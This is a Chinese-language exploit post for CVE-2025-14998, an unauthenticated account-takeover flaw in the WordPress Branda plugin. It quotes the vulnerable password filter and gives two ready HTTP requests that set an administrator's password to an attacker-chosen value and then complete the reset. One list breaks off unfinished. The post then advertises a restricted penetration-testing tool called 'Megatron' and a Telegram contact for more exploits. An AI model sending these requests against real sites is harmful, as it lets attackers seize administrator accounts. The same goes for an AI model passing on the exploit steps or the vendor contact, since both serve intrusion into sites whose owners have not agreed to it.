CVE-2025-14998 WordPress 的 Branda 插件在包括 3.4.24 在内的所有版本中,均存在通过账户接管进行权限提升的漏洞。这是由于该插件在更新用户密码之前,未正确验证用户身份。这使得未认证攻击者能够更改任意用户(包括管理员)的密码,并借此获取其账户的访问权限。
如需了解更多 WordPress 漏洞和专属渗透测试工具,请通过 Telegram 联系我 @KtN1990。
该插件通过挂钩 random_password 过滤器,覆盖了 WordPress 的密码生成逻辑。它并未让 WordPress 生成安全的随机密码,而是将其替换为用户可控的输入。
public function password_random_password_filter( $password ) {
global $wpdb, $signup_password_use_encryption;
if ( isset( $_GET['key'] ) && ! empty( $_GET['key'] ) ) {
$key = $_GET['key'];
} elseif ( isset( $_POST['key'] ) && ! empty( $_POST['key'] ) ) {
$key = $_POST['key'];
}
if ( ! empty( $_POST['password_1'] ) ) {
$password = $_POST['password_1'];
} elseif ( ! empty( $key ) ) {
$signup = $wpdb->get_row(
$wpdb->prepare(
"SELECT * FROM $wpdb->signups WHERE activation_key = '%s'",
$key
)
);
if ( ! ( empty( $signup ) || $signup->active ) ) {
$meta = maybe_unserialize( $signup->meta );
if ( ! empty( $meta['password'] ) ) {
if ( 'yes' === $signup_password_use_encryption ) {
$password = $this->password_decrypt( $meta['password'] );
} else {
$password = $meta['password'];
}
}
}
}
return $password;
}
POST /wp/wp-login.php?action=lostpassword HTTP/1.1
Host: example.local
Content-Type: application/x-www-form-urlencoded
user_login=admin&
redirect_to=&
password_1=EfUSmvnTun5XbvE6RvIB&
wp-submit=Get+New+Password
password_1 的值可以是任意攻击者可控的字符串。
GET /wp/wp-login.php?login=admin&key=EfUSmvnTun5XbvE6RvIB&action=rp HTTP/1.1
Host: example.local
无需邮箱访问权限或有效的密码重置令牌。
未认证攻击者可以:

💣 什么是 Megatron?Megatron 是一款专为严肃测试人员和红队成员设计的高级渗透测试工具。无论是审计、扫描还是测试基础设施,Megatron 都能提供你所需的能力。
🛡️ 适用对象: – 安全研究人员 – 渗透测试人员 – 道德黑客
📦 持续维护,包含约 230 个旧版研究模块;近期对扫描器核心进行了改进,以提升稳定性和检测能力。
🎯 目的:仅为经过授权的安全测试、教育、防御性研究和红队训练而提供。本版本不得用于非法用途。分发受限 — 需经过验证并签署《负责任使用协议》/ NDA 后方可获取访问权限。
🛡 负责任访问政策(摘要):